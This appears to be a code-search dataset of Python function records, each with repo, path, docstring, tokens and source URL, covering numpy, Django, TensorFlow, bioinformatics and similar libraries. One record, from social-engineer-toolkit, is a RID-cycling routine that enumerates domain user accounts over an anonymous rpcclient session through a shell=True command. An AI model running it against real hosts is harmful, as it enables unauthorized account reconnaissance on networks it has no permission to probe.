securityclippy/elasticintel
aa08d3e9f5ab1c000128e95161139ce97ff0e334
ingest_feed_lambda/numpy/lib/function_base.py
python
_update_dim_sizes
(dim_sizes, arg, core_dims)
Incrementally check and update core dimension sizes for a single argument. Arguments --------- dim_sizes : Dict[str, int] Sizes of existing core dimensions. Will be updated in-place. arg : ndarray Argument to examine. core_dims : Tuple[str, ...] Core dimensions for this argument.
Incrementally check and update core dimension sizes for a single argument.
[ "Incrementally", "check", "and", "update", "core", "dimension", "sizes", "for", "a", "single", "argument", "." ]
def _update_dim_sizes(dim_sizes, arg, core_dims): """ Incrementally check and update core dimension sizes for a single argument. Arguments --------- dim_sizes : Dict[str, int] Sizes of existing core dimensions. Will be updated in-place. arg : ndarray Argument to examine. core_dims : Tuple[str, ...] Core dimensions for this argument. """ if not core_dims: return num_core_dims = len(core_dims) if arg.ndim < num_core_dims: raise ValueError( '%d-dimensional argument does not have enough ' 'dimensions for all core dimensions %r' % (arg.ndim, core_dims)) core_shape = arg.shape[-num_core_dims:] for dim, size in zip(core_dims, core_shape): if dim in dim_sizes: if size != dim_sizes[dim]: raise ValueError( 'inconsistent size for core dimension %r: %r vs %r' % (dim, size, dim_sizes[dim])) else: dim_sizes[dim] = size
[ "def", "_update_dim_sizes", "(", "dim_sizes", ",", "arg", ",", "core_dims", ")", ":", "if", "not", "core_dims", ":", "return", "num_core_dims", "=", "len", "(", "core_dims", ")", "if", "arg", ".", "ndim", "<", "num_core_dims", ":", "raise", "ValueError", "(", "'%d-dimensional argument does not have enough '", "'dimensions for all core dimensions %r'", "%", "(", "arg", ".", "ndim", ",", "core_dims", ")", ")", "core_shape", "=", "arg", ".", "shape", "[", "-", "num_core_dims", ":", "]", "for", "dim", ",", "size", "in", "zip", "(", "core_dims", ",", "core_shape", ")", ":", "if", "dim", "in", "dim_sizes", ":", "if", "size", "!=", "dim_sizes", "[", "dim", "]", ":", "raise", "ValueError", "(", "'inconsistent size for core dimension %r: %r vs %r'", "%", "(", "dim", ",", "size", ",", "dim_sizes", "[", "dim", "]", ")", ")", "else", ":", "dim_sizes", "[", "dim", "]", "=", "size" ]
https://github.com/securityclippy/elasticintel/blob/aa08d3e9f5ab1c000128e95161139ce97ff0e334/ingest_feed_lambda/numpy/lib/function_base.py#L2450-L2481
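A usage sketch showing the in-place update and the error path (array shapes hypothetical):

import numpy as np

dim_sizes = {}
a = np.zeros((5, 3, 4))
_update_dim_sizes(dim_sizes, a, ('m', 'n'))  # trailing dims are the core dims
print(dim_sizes)                             # {'m': 3, 'n': 4}

b = np.zeros((3, 7))
_update_dim_sizes(dim_sizes, b, ('m', 'n'))
# -> ValueError: inconsistent size for core dimension 'n': 7 vs 4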
django-nonrel/django-nonrel
4fbfe7344481a5eab8698f79207f09124310131b
django/core/cache/backends/base.py
python
BaseCache.decr
(self, key, delta=1, version=None)
return self.incr(key, -delta, version=version)
Subtract delta from value in the cache. If the key does not exist, raise a ValueError exception.
Subtract delta from value in the cache. If the key does not exist, raise a ValueError exception.
[ "Subtract", "delta", "from", "value", "in", "the", "cache", ".", "If", "the", "key", "does", "not", "exist", "raise", "a", "ValueError", "exception", "." ]
def decr(self, key, delta=1, version=None): """ Subtract delta from value in the cache. If the key does not exist, raise a ValueError exception. """ return self.incr(key, -delta, version=version)
[ "def", "decr", "(", "self", ",", "key", ",", "delta", "=", "1", ",", "version", "=", "None", ")", ":", "return", "self", ".", "incr", "(", "key", ",", "-", "delta", ",", "version", "=", "version", ")" ]
https://github.com/django-nonrel/django-nonrel/blob/4fbfe7344481a5eab8698f79207f09124310131b/django/core/cache/backends/base.py#L147-L152
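Typical cache usage implied by the record above (sketch; any backend inheriting BaseCache behaves this way):

from django.core.cache import cache

cache.set("hits", 10)
cache.decr("hits")           # 9 -- delegates to incr("hits", -1)
cache.decr("hits", delta=4)  # 5
cache.decr("missing")        # raises ValueError: the key does not exist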
tobegit3hub/deep_image_model
8a53edecd9e00678b278bb10f6fb4bdb1e4ee25e
java_predict_client/src/main/proto/tensorflow/contrib/tensor_forest/python/tensor_forest.py
python
ForestHParams.fill
(self)
return self
Intelligently sets any non-specific parameters.
Intelligently sets any non-specific parameters.
[ "Intelligently", "sets", "any", "non", "-", "specific", "parameters", "." ]
def fill(self): """Intelligently sets any non-specific parameters.""" # Fail fast if num_classes or num_features isn't set. _ = getattr(self, 'num_classes') _ = getattr(self, 'num_features') self.bagged_num_features = int(self.feature_bagging_fraction * self.num_features) self.bagged_features = None if self.feature_bagging_fraction < 1.0: self.bagged_features = [random.sample( range(self.num_features), self.bagged_num_features) for _ in range(self.num_trees)] self.regression = getattr(self, 'regression', False) # Num_outputs is the actual number of outputs (a single prediction for # classification, a N-dimenensional point for regression). self.num_outputs = self.num_classes if self.regression else 1 # Add an extra column to classes for storing counts, which is needed for # regression and avoids having to recompute sums for classification. self.num_output_columns = self.num_classes + 1 # The Random Forest literature recommends sqrt(# features) for # classification problems, and p/3 for regression problems. # TODO(thomaswc): Consider capping this for large number of features. self.num_splits_to_consider = ( self.num_splits_to_consider or max(10, int(math.ceil(math.sqrt(self.num_features))))) # max_fertile_nodes doesn't effect performance, only training speed. # We therefore set it primarily based upon space considerations. # Each fertile node takes up num_splits_to_consider times as much # as space as a non-fertile node. We want the fertile nodes to in # total only take up as much space as the non-fertile nodes, so num_fertile = int(math.ceil(self.max_nodes / self.num_splits_to_consider)) # But always use at least 1000 accumulate slots. num_fertile = max(num_fertile, 1000) self.max_fertile_nodes = self.max_fertile_nodes or num_fertile # But it also never needs to be larger than the number of leaves, # which is max_nodes / 2. self.max_fertile_nodes = min(self.max_fertile_nodes, int(math.ceil(self.max_nodes / 2.0))) # We have num_splits_to_consider slots to fill, and we want to spend # approximately split_after_samples samples initializing them. num_split_initializiations_per_input = max(1, int(math.floor( self.num_splits_to_consider / self.split_after_samples))) self.split_initializations_per_input = getattr( self, 'split_initializations_per_input', num_split_initializiations_per_input) # If base_random_seed is 0, the current time will be used to seed the # random number generators for each tree. If non-zero, the i-th tree # will be seeded with base_random_seed + i. self.base_random_seed = getattr(self, 'base_random_seed', 0) return self
[ "def", "fill", "(", "self", ")", ":", "# Fail fast if num_classes or num_features isn't set.", "_", "=", "getattr", "(", "self", ",", "'num_classes'", ")", "_", "=", "getattr", "(", "self", ",", "'num_features'", ")", "self", ".", "bagged_num_features", "=", "int", "(", "self", ".", "feature_bagging_fraction", "*", "self", ".", "num_features", ")", "self", ".", "bagged_features", "=", "None", "if", "self", ".", "feature_bagging_fraction", "<", "1.0", ":", "self", ".", "bagged_features", "=", "[", "random", ".", "sample", "(", "range", "(", "self", ".", "num_features", ")", ",", "self", ".", "bagged_num_features", ")", "for", "_", "in", "range", "(", "self", ".", "num_trees", ")", "]", "self", ".", "regression", "=", "getattr", "(", "self", ",", "'regression'", ",", "False", ")", "# Num_outputs is the actual number of outputs (a single prediction for", "# classification, a N-dimenensional point for regression).", "self", ".", "num_outputs", "=", "self", ".", "num_classes", "if", "self", ".", "regression", "else", "1", "# Add an extra column to classes for storing counts, which is needed for", "# regression and avoids having to recompute sums for classification.", "self", ".", "num_output_columns", "=", "self", ".", "num_classes", "+", "1", "# The Random Forest literature recommends sqrt(# features) for", "# classification problems, and p/3 for regression problems.", "# TODO(thomaswc): Consider capping this for large number of features.", "self", ".", "num_splits_to_consider", "=", "(", "self", ".", "num_splits_to_consider", "or", "max", "(", "10", ",", "int", "(", "math", ".", "ceil", "(", "math", ".", "sqrt", "(", "self", ".", "num_features", ")", ")", ")", ")", ")", "# max_fertile_nodes doesn't effect performance, only training speed.", "# We therefore set it primarily based upon space considerations.", "# Each fertile node takes up num_splits_to_consider times as much", "# as space as a non-fertile node. We want the fertile nodes to in", "# total only take up as much space as the non-fertile nodes, so", "num_fertile", "=", "int", "(", "math", ".", "ceil", "(", "self", ".", "max_nodes", "/", "self", ".", "num_splits_to_consider", ")", ")", "# But always use at least 1000 accumulate slots.", "num_fertile", "=", "max", "(", "num_fertile", ",", "1000", ")", "self", ".", "max_fertile_nodes", "=", "self", ".", "max_fertile_nodes", "or", "num_fertile", "# But it also never needs to be larger than the number of leaves,", "# which is max_nodes / 2.", "self", ".", "max_fertile_nodes", "=", "min", "(", "self", ".", "max_fertile_nodes", ",", "int", "(", "math", ".", "ceil", "(", "self", ".", "max_nodes", "/", "2.0", ")", ")", ")", "# We have num_splits_to_consider slots to fill, and we want to spend", "# approximately split_after_samples samples initializing them.", "num_split_initializiations_per_input", "=", "max", "(", "1", ",", "int", "(", "math", ".", "floor", "(", "self", ".", "num_splits_to_consider", "/", "self", ".", "split_after_samples", ")", ")", ")", "self", ".", "split_initializations_per_input", "=", "getattr", "(", "self", ",", "'split_initializations_per_input'", ",", "num_split_initializiations_per_input", ")", "# If base_random_seed is 0, the current time will be used to seed the", "# random number generators for each tree. If non-zero, the i-th tree", "# will be seeded with base_random_seed + i.", "self", ".", "base_random_seed", "=", "getattr", "(", "self", ",", "'base_random_seed'", ",", "0", ")", "return", "self" ]
https://github.com/tobegit3hub/deep_image_model/blob/8a53edecd9e00678b278bb10f6fb4bdb1e4ee25e/java_predict_client/src/main/proto/tensorflow/contrib/tensor_forest/python/tensor_forest.py#L89-L148
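The heuristics above are easier to see with numbers; a worked example under hypothetical settings (num_features=784, max_nodes=10000, split_after_samples=250, num_splits_to_consider unset):

import math

num_splits_to_consider = max(10, int(math.ceil(math.sqrt(784))))    # 28
num_fertile = max(int(math.ceil(10000 / 28.0)), 1000)               # 1000 (floor of 1000 wins)
max_fertile_nodes = min(num_fertile, int(math.ceil(10000 / 2.0)))   # 1000 (capped by leaves)
split_inits_per_input = max(1, int(math.floor(28 / 250.0)))         # 1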
wucng/TensorExpand
4ea58f64f5c5082b278229b799c9f679536510b7
TensorExpand/图片项目/8、CIFAR-10/cifar10.py
python
load_training_data
()
return images, cls, one_hot_encoded(class_numbers=cls, num_classes=num_classes)
Load all the training-data for the CIFAR-10 data-set. The data-set is split into 5 data-files which are merged here. Returns the images, class-numbers and one-hot encoded class-labels.
Load all the training-data for the CIFAR-10 data-set. The data-set is split into 5 data-files which are merged here. Returns the images, class-numbers and one-hot encoded class-labels.
[ "Load", "all", "the", "training", "-", "data", "for", "the", "CIFAR", "-", "10", "data", "-", "set", ".", "The", "data", "-", "set", "is", "split", "into", "5", "data", "-", "files", "which", "are", "merged", "here", ".", "Returns", "the", "images", "class", "-", "numbers", "and", "one", "-", "hot", "encoded", "class", "-", "labels", "." ]
def load_training_data(): """ Load all the training-data for the CIFAR-10 data-set. The data-set is split into 5 data-files which are merged here. Returns the images, class-numbers and one-hot encoded class-labels. """ # Pre-allocate the arrays for the images and class-numbers for efficiency. images = np.zeros(shape=[_num_images_train, img_size, img_size, num_channels], dtype=float) cls = np.zeros(shape=[_num_images_train], dtype=int) # Begin-index for the current batch. begin = 0 # For each data-file. for i in range(_num_files_train): # Load the images and class-numbers from the data-file. images_batch, cls_batch = _load_data(filename="data_batch_" + str(i + 1)) # Number of images in this batch. num_images = len(images_batch) # End-index for the current batch. end = begin + num_images # Store the images into the array. images[begin:end, :] = images_batch # Store the class-numbers into the array. cls[begin:end] = cls_batch # The begin-index for the next batch is the current end-index. begin = end return images, cls, one_hot_encoded(class_numbers=cls, num_classes=num_classes)
[ "def", "load_training_data", "(", ")", ":", "# Pre-allocate the arrays for the images and class-numbers for efficiency.", "images", "=", "np", ".", "zeros", "(", "shape", "=", "[", "_num_images_train", ",", "img_size", ",", "img_size", ",", "num_channels", "]", ",", "dtype", "=", "float", ")", "cls", "=", "np", ".", "zeros", "(", "shape", "=", "[", "_num_images_train", "]", ",", "dtype", "=", "int", ")", "# Begin-index for the current batch.", "begin", "=", "0", "# For each data-file.", "for", "i", "in", "range", "(", "_num_files_train", ")", ":", "# Load the images and class-numbers from the data-file.", "images_batch", ",", "cls_batch", "=", "_load_data", "(", "filename", "=", "\"data_batch_\"", "+", "str", "(", "i", "+", "1", ")", ")", "# Number of images in this batch.", "num_images", "=", "len", "(", "images_batch", ")", "# End-index for the current batch.", "end", "=", "begin", "+", "num_images", "# Store the images into the array.", "images", "[", "begin", ":", "end", ",", ":", "]", "=", "images_batch", "# Store the class-numbers into the array.", "cls", "[", "begin", ":", "end", "]", "=", "cls_batch", "# The begin-index for the next batch is the current end-index.", "begin", "=", "end", "return", "images", ",", "cls", ",", "one_hot_encoded", "(", "class_numbers", "=", "cls", ",", "num_classes", "=", "num_classes", ")" ]
https://github.com/wucng/TensorExpand/blob/4ea58f64f5c5082b278229b799c9f679536510b7/TensorExpand/图片项目/8、CIFAR-10/cifar10.py#L183-L217
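Index bookkeeping for the merge above, assuming the usual CIFAR-10 layout of five files with 10,000 images each:

begin = 0
for i in range(5):          # _num_files_train
    end = begin + 10000     # images in data_batch_{i+1}
    # images[begin:end] receives that file's batch
    begin = end
print(begin)                # 50000 == _num_images_train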
sagemath/sage
f9b2db94f675ff16963ccdefba4f1a3393b3fe0d
src/sage/knots/knotinfo.py
python
KnotInfoBase.is_almost_alternating
(self)
return knotinfo_bool(self[self.items.almost_alternating])
r""" Return whether ``self`` is almost alternating. EXAMPLES:: sage: from sage.knots.knotinfo import KnotInfo sage: KnotInfo.K5_2.is_almost_alternating() # optional - database_knotinfo False
r""" Return whether ``self`` is almost alternating.
[ "r", "Return", "whether", "self", "is", "almost", "alternating", "." ]
def is_almost_alternating(self): r""" Return whether ``self`` is almost alternating. EXAMPLES:: sage: from sage.knots.knotinfo import KnotInfo sage: KnotInfo.K5_2.is_almost_alternating() # optional - database_knotinfo False """ db._feature.require() # column not available in demo-version return knotinfo_bool(self[self.items.almost_alternating])
[ "def", "is_almost_alternating", "(", "self", ")", ":", "db", ".", "_feature", ".", "require", "(", ")", "# column not available in demo-version", "return", "knotinfo_bool", "(", "self", "[", "self", ".", "items", ".", "almost_alternating", "]", ")" ]
https://github.com/sagemath/sage/blob/f9b2db94f675ff16963ccdefba4f1a3393b3fe0d/src/sage/knots/knotinfo.py#L1024-L1035
OneDrive/onedrive-sdk-python
e5642f8cad8eea37a4f653c1a23dfcfc06c37110
src/onedrivesdk/model/audio.py
python
Audio.is_variable_bitrate
(self)
Gets and sets the isVariableBitrate Returns: bool: The isVariableBitrate
Gets and sets the isVariableBitrate Returns: bool: The isVariableBitrate
[ "Gets", "and", "sets", "the", "isVariableBitrate", "Returns", ":", "bool", ":", "The", "isVariableBitrate" ]
def is_variable_bitrate(self): """Gets and sets the isVariableBitrate Returns: bool: The isVariableBitrate """ if "isVariableBitrate" in self._prop_dict: return self._prop_dict["isVariableBitrate"] else: return None
[ "def", "is_variable_bitrate", "(", "self", ")", ":", "if", "\"isVariableBitrate\"", "in", "self", ".", "_prop_dict", ":", "return", "self", ".", "_prop_dict", "[", "\"isVariableBitrate\"", "]", "else", ":", "return", "None" ]
https://github.com/OneDrive/onedrive-sdk-python/blob/e5642f8cad8eea37a4f653c1a23dfcfc06c37110/src/onedrivesdk/model/audio.py#L205-L215
mysql/mysql-connector-python
c5460bcbb0dff8e4e48bf4af7a971c89bf486d85
lib/mysqlx/statement.py
python
ModifyStatement.execute
(self)
return self._connection.send_update(self)
Execute the statement. Returns: mysqlx.Result: Result object. Raises: ProgrammingError: If condition was not set.
Execute the statement.
[ "Execute", "the", "statement", "." ]
def execute(self): """Execute the statement. Returns: mysqlx.Result: Result object. Raises: ProgrammingError: If condition was not set. """ if not self.has_where: raise ProgrammingError("No condition was found for modify") return self._connection.send_update(self)
[ "def", "execute", "(", "self", ")", ":", "if", "not", "self", ".", "has_where", ":", "raise", "ProgrammingError", "(", "\"No condition was found for modify\"", ")", "return", "self", ".", "_connection", ".", "send_update", "(", "self", ")" ]
https://github.com/mysql/mysql-connector-python/blob/c5460bcbb0dff8e4e48bf4af7a971c89bf486d85/lib/mysqlx/statement.py#L883-L894
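A usage sketch for the statement above; connection parameters are hypothetical, and the fluent API is assumed to follow the X DevAPI shape:

import mysqlx

session = mysqlx.get_session("mysqlx://user:pass@localhost:33060")
docs = session.get_schema("test").get_collection("docs")
# The condition passed to modify() sets has_where; without it,
# execute() raises ProgrammingError("No condition was found for modify").
docs.modify("name = 'alice'").set("age", 31).execute()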
TensorSpeech/TensorflowTTS
34358d82a4c91fd70344872f8ea8a405ea84aedb
tensorflow_tts/models/fastspeech.py
python
TFTacotronPostnet.call
(self, inputs, training=False)
return outputs * extended_mask
Call logic.
Call logic.
[ "Call", "logic", "." ]
def call(self, inputs, training=False): """Call logic.""" outputs, mask = inputs extended_mask = tf.cast(tf.expand_dims(mask, axis=2), outputs.dtype) for i, (conv, bn) in enumerate(self.conv_batch_norm): outputs = conv(outputs) outputs = bn(outputs) outputs = self.activation[i](outputs) outputs = self.dropout(outputs, training=training) return outputs * extended_mask
[ "def", "call", "(", "self", ",", "inputs", ",", "training", "=", "False", ")", ":", "outputs", ",", "mask", "=", "inputs", "extended_mask", "=", "tf", ".", "cast", "(", "tf", ".", "expand_dims", "(", "mask", ",", "axis", "=", "2", ")", ",", "outputs", ".", "dtype", ")", "for", "i", ",", "(", "conv", ",", "bn", ")", "in", "enumerate", "(", "self", ".", "conv_batch_norm", ")", ":", "outputs", "=", "conv", "(", "outputs", ")", "outputs", "=", "bn", "(", "outputs", ")", "outputs", "=", "self", ".", "activation", "[", "i", "]", "(", "outputs", ")", "outputs", "=", "self", ".", "dropout", "(", "outputs", ",", "training", "=", "training", ")", "return", "outputs", "*", "extended_mask" ]
https://github.com/TensorSpeech/TensorflowTTS/blob/34358d82a4c91fd70344872f8ea8a405ea84aedb/tensorflow_tts/models/fastspeech.py#L564-L573
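How the mask multiplication at the end zeroes padded frames, sketched with tiny hypothetical tensors:

import tensorflow as tf

outputs = tf.ones([2, 4, 3])                        # [batch, time, mel] (hypothetical)
mask = tf.constant([[1, 1, 0, 0], [1, 1, 1, 0]])    # 1 = real frame, 0 = padding
extended = tf.cast(tf.expand_dims(mask, axis=2), outputs.dtype)  # [2, 4, 1]
print((outputs * extended)[0, :, 0])                # -> [1. 1. 0. 0.]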
trustedsec/social-engineer-toolkit
02ed2e8f11635546d8d176daf736508bee9d742e
src/fasttrack/ridenum.py
python
sids_to_names
(ip, sid, start, stop)
return rid_accounts
[]
def sids_to_names(ip, sid, start, stop): rid_accounts = [] ranges = ['{0}-{1}'.format(sid, rid) for rid in range(start, stop)] # different chunk size for darwin (os x) chunk_size = 2500 if sys.platform == 'darwin': chunk_size = 5000 chunks = list(chunk(ranges, chunk_size)) for c in chunks: command = 'rpcclient -U "" {0} -N -c "lookupsids '.format(ip) command += ' '.join(c) command += '"' proc = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) stdout_value = proc.communicate()[0] if "NT_STATUS_ACCESS_DENIED" in stdout_value: print("[!] Server sent NT_STATUS_ACCESS DENIED, unable to extract users.") global denied denied = 1 break for line in stdout_value.rstrip().split('\n'): if "*unknown*" not in line: if line != "": rid_account = line.split(" ", 1)[1] # will show during an unhandled request # '00000' are bogus accounts? # only return accounts ie. (1). Everything else should be a group if rid_account != "request" and '00000' not in rid_account and '(1)' in rid_account: # here we join based on spaces, for example 'Domain Admins' needs to be joined rid_account = rid_account.replace("(1)", "") # return the full domain\username rid_account = rid_account.rstrip() rid_accounts.append(rid_account) return rid_accounts
[ "def", "sids_to_names", "(", "ip", ",", "sid", ",", "start", ",", "stop", ")", ":", "rid_accounts", "=", "[", "]", "ranges", "=", "[", "'{0}-{1}'", ".", "format", "(", "sid", ",", "rid", ")", "for", "rid", "in", "range", "(", "start", ",", "stop", ")", "]", "# different chunk size for darwin (os x)", "chunk_size", "=", "2500", "if", "sys", ".", "platform", "==", "'darwin'", ":", "chunk_size", "=", "5000", "chunks", "=", "list", "(", "chunk", "(", "ranges", ",", "chunk_size", ")", ")", "for", "c", "in", "chunks", ":", "command", "=", "'rpcclient -U \"\" {0} -N -c \"lookupsids '", ".", "format", "(", "ip", ")", "command", "+=", "' '", ".", "join", "(", "c", ")", "command", "+=", "'\"'", "proc", "=", "subprocess", ".", "Popen", "(", "command", ",", "stdout", "=", "subprocess", ".", "PIPE", ",", "stderr", "=", "subprocess", ".", "PIPE", ",", "shell", "=", "True", ")", "stdout_value", "=", "proc", ".", "communicate", "(", ")", "[", "0", "]", "if", "\"NT_STATUS_ACCESS_DENIED\"", "in", "stdout_value", ":", "print", "(", "\"[!] Server sent NT_STATUS_ACCESS DENIED, unable to extract users.\"", ")", "global", "denied", "denied", "=", "1", "break", "for", "line", "in", "stdout_value", ".", "rstrip", "(", ")", ".", "split", "(", "'\\n'", ")", ":", "if", "\"*unknown*\"", "not", "in", "line", ":", "if", "line", "!=", "\"\"", ":", "rid_account", "=", "line", ".", "split", "(", "\" \"", ",", "1", ")", "[", "1", "]", "# will show during an unhandled request", "# '00000' are bogus accounts?", "# only return accounts ie. (1). Everything else should be a group", "if", "rid_account", "!=", "\"request\"", "and", "'00000'", "not", "in", "rid_account", "and", "'(1)'", "in", "rid_account", ":", "# here we join based on spaces, for example 'Domain Admins' needs to be joined", "rid_account", "=", "rid_account", ".", "replace", "(", "\"(1)\"", ",", "\"\"", ")", "# return the full domain\\username", "rid_account", "=", "rid_account", ".", "rstrip", "(", ")", "rid_accounts", ".", "append", "(", "rid_account", ")", "return", "rid_accounts" ]
https://github.com/trustedsec/social-engineer-toolkit/blob/02ed2e8f11635546d8d176daf736508bee9d742e/src/fasttrack/ridenum.py#L105-L139
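`chunk` is called above but not included in the record; a plausible sketch of such a helper (an assumption, not the file's actual code):

def chunk(items, size):
    """Yield successive size-sized slices of a list."""
    for i in range(0, len(items), size):
        yield items[i:i + size]

# e.g. 6000 SID-RID strings -> rpcclient batches of 2500, 2500 and 1000:
ranges = ['S-1-5-21-x-{0}'.format(rid) for rid in range(500, 6500)]
print([len(c) for c in chunk(ranges, 2500)])   # [2500, 2500, 1000]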
andreikop/enki
3170059e5cb46dcc77d7fb1457c38a8a5f13af66
enki/plugins/cppfileswitch.py
python
Plugin._isImplementation
(self, filePath)
return any([filePath.endswith(suffix) for suffix in _IMPLEMENTATION_SUFFIXES])
Check if file is an implementation file
Check if file is an implementation file
[ "Check", "if", "file", "is", "an", "implementation", "file" ]
def _isImplementation(self, filePath): """Check if file is an implementation file """ return any([filePath.endswith(suffix) for suffix in _IMPLEMENTATION_SUFFIXES])
[ "def", "_isImplementation", "(", "self", ",", "filePath", ")", ":", "return", "any", "(", "[", "filePath", ".", "endswith", "(", "suffix", ")", "for", "suffix", "in", "_IMPLEMENTATION_SUFFIXES", "]", ")" ]
https://github.com/andreikop/enki/blob/3170059e5cb46dcc77d7fb1457c38a8a5f13af66/enki/plugins/cppfileswitch.py#L59-L63
grnet/synnefo
d06ec8c7871092131cdaabf6b03ed0b504c93e43
astakosclient/astakosclient/__init__.py
python
AstakosClient.membership_action
(self, memb_id, action, reason="")
return self._call_astakos(path, headers=req_headers, body=req_body, method="POST")
Perform action on a membership Arguments: memb_id -- membership identifier action -- action to perform, one of "leave", "cancel", "accept", "reject", "remove" reason -- reason of performing the action In case of success, return nothing.
Perform action on a membership
[ "Perform", "action", "on", "a", "membership" ]
def membership_action(self, memb_id, action, reason=""): """Perform action on a membership Arguments: memb_id -- membership identifier action -- action to perform, one of "leave", "cancel", "accept", "reject", "remove" reason -- reason of performing the action In case of success, return nothing. """ path = join_urls(self.api_memberships, str(memb_id)) path = join_urls(path, "action") req_headers = {'content-type': 'application/json'} req_body = parse_request({action: reason}, self.logger) return self._call_astakos(path, headers=req_headers, body=req_body, method="POST")
[ "def", "membership_action", "(", "self", ",", "memb_id", ",", "action", ",", "reason", "=", "\"\"", ")", ":", "path", "=", "join_urls", "(", "self", ".", "api_memberships", ",", "str", "(", "memb_id", ")", ")", "path", "=", "join_urls", "(", "path", ",", "\"action\"", ")", "req_headers", "=", "{", "'content-type'", ":", "'application/json'", "}", "req_body", "=", "parse_request", "(", "{", "action", ":", "reason", "}", ",", "self", ".", "logger", ")", "return", "self", ".", "_call_astakos", "(", "path", ",", "headers", "=", "req_headers", ",", "body", "=", "req_body", ",", "method", "=", "\"POST\"", ")" ]
https://github.com/grnet/synnefo/blob/d06ec8c7871092131cdaabf6b03ed0b504c93e43/astakosclient/astakosclient/__init__.py#L1008-L1024
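A usage sketch for the call above; endpoint, token and membership id are hypothetical:

from astakosclient import AstakosClient

client = AstakosClient("user-token", "https://astakos.example.org/identity")
# POSTs {"accept": "welcome aboard"} to <api_memberships>/42/action
client.membership_action(42, "accept", reason="welcome aboard")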
bcbio/bcbio-nextgen
c80f9b6b1be3267d1f981b7035e3b72441d258f2
bcbio/variation/multi.py
python
_group_batches_shared
(xs, caller_batch_fn, prep_data_fn)
return singles + batches
Shared functionality for grouping by batches for variant calling and joint calling. when creating a pon (batch: pon_build) process samples as singles first
Shared functionality for grouping by batches for variant calling and joint calling. when creating a pon (batch: pon_build) process samples as singles first
[ "Shared", "functionality", "for", "grouping", "by", "batches", "for", "variant", "calling", "and", "joint", "calling", ".", "when", "creating", "a", "pon", "(", "batch", ":", "pon_build", ")", "process", "samples", "as", "singles", "first" ]
def _group_batches_shared(xs, caller_batch_fn, prep_data_fn): """Shared functionality for grouping by batches for variant calling and joint calling. when creating a pon (batch: pon_build) process samples as singles first """ singles = [] batch_groups = collections.defaultdict(list) for args in xs: data = utils.to_single_data(args) caller, batch = caller_batch_fn(data) region = _list_to_tuple(data["region"]) if "region" in data else () if batch is not None and batch != "pon_build": batches = batch if isinstance(batch, (list, tuple)) else [batch] for b in batches: batch_groups[(b, region, caller)].append(utils.deepish_copy(data)) else: data = prep_data_fn(data, [data]) singles.append(data) batches = [] for batch, items in batch_groups.items(): batch_data = utils.deepish_copy(_pick_lead_item(items)) # For nested primary batches, split permanently by batch if tz.get_in(["metadata", "batch"], batch_data): batch_name = batch[0] batch_data["metadata"]["batch"] = batch_name batch_data = prep_data_fn(batch_data, items) batch_data["group_orig"] = _collapse_subitems(batch_data, items) batch_data["group"] = batch batches.append(batch_data) return singles + batches
[ "def", "_group_batches_shared", "(", "xs", ",", "caller_batch_fn", ",", "prep_data_fn", ")", ":", "singles", "=", "[", "]", "batch_groups", "=", "collections", ".", "defaultdict", "(", "list", ")", "for", "args", "in", "xs", ":", "data", "=", "utils", ".", "to_single_data", "(", "args", ")", "caller", ",", "batch", "=", "caller_batch_fn", "(", "data", ")", "region", "=", "_list_to_tuple", "(", "data", "[", "\"region\"", "]", ")", "if", "\"region\"", "in", "data", "else", "(", ")", "if", "batch", "is", "not", "None", "and", "batch", "!=", "\"pon_build\"", ":", "batches", "=", "batch", "if", "isinstance", "(", "batch", ",", "(", "list", ",", "tuple", ")", ")", "else", "[", "batch", "]", "for", "b", "in", "batches", ":", "batch_groups", "[", "(", "b", ",", "region", ",", "caller", ")", "]", ".", "append", "(", "utils", ".", "deepish_copy", "(", "data", ")", ")", "else", ":", "data", "=", "prep_data_fn", "(", "data", ",", "[", "data", "]", ")", "singles", ".", "append", "(", "data", ")", "batches", "=", "[", "]", "for", "batch", ",", "items", "in", "batch_groups", ".", "items", "(", ")", ":", "batch_data", "=", "utils", ".", "deepish_copy", "(", "_pick_lead_item", "(", "items", ")", ")", "# For nested primary batches, split permanently by batch", "if", "tz", ".", "get_in", "(", "[", "\"metadata\"", ",", "\"batch\"", "]", ",", "batch_data", ")", ":", "batch_name", "=", "batch", "[", "0", "]", "batch_data", "[", "\"metadata\"", "]", "[", "\"batch\"", "]", "=", "batch_name", "batch_data", "=", "prep_data_fn", "(", "batch_data", ",", "items", ")", "batch_data", "[", "\"group_orig\"", "]", "=", "_collapse_subitems", "(", "batch_data", ",", "items", ")", "batch_data", "[", "\"group\"", "]", "=", "batch", "batches", ".", "append", "(", "batch_data", ")", "return", "singles", "+", "batches" ]
https://github.com/bcbio/bcbio-nextgen/blob/c80f9b6b1be3267d1f981b7035e3b72441d258f2/bcbio/variation/multi.py#L106-L134
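The grouping key above is (batch, region, caller); a stripped-down sketch with hypothetical samples:

import collections

samples = [
    {"name": "s1", "batch": "b1", "region": ("chr1", 0, 1000), "caller": "gatk"},
    {"name": "s2", "batch": "b1", "region": ("chr1", 0, 1000), "caller": "gatk"},
    {"name": "s3", "batch": None, "region": ("chr1", 0, 1000), "caller": "gatk"},
]
groups, singles = collections.defaultdict(list), []
for s in samples:
    if s["batch"] is not None:  # the real code also routes batch == "pon_build" to singles
        groups[(s["batch"], s["region"], s["caller"])].append(s)
    else:
        singles.append(s)
# -> one batch [s1, s2] under ("b1", region, "gatk"); s3 stays single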
mcfletch/pyopengl
02d11dad9ff18e50db10e975c4756e17bf198464
documentation/pydoc/pydoc2.py
python
PackageDocumentationGenerator.addInteresting
( self, specifier)
Add a module to the list of interesting modules
Add a module to the list of interesting modules
[ "Add", "a", "module", "to", "the", "list", "of", "interesting", "modules" ]
def addInteresting( self, specifier): """Add a module to the list of interesting modules""" if self.checkScope( specifier): ## print "addInteresting", specifier self.pending.append (specifier) else: self.completed[ specifier] = 1
[ "def", "addInteresting", "(", "self", ",", "specifier", ")", ":", "if", "self", ".", "checkScope", "(", "specifier", ")", ":", "##\t\t\tprint \"addInteresting\", specifier", "self", ".", "pending", ".", "append", "(", "specifier", ")", "else", ":", "self", ".", "completed", "[", "specifier", "]", "=", "1" ]
https://github.com/mcfletch/pyopengl/blob/02d11dad9ff18e50db10e975c4756e17bf198464/documentation/pydoc/pydoc2.py#L395-L401
RichardFrangenberg/Prism
09283b5146d9cdf9d489dcf252f7927083534a48
Prism/Plugins/ProjectManagers/Shotgun/external_modules/shotgun_api3/shotgun.py
python
Shotgun._make_call
(self, verb, path, body, headers)
Make an HTTP call to the server. Handles retry and failure.
Make an HTTP call to the server.
[ "Make", "an", "HTTP", "call", "to", "the", "server", "." ]
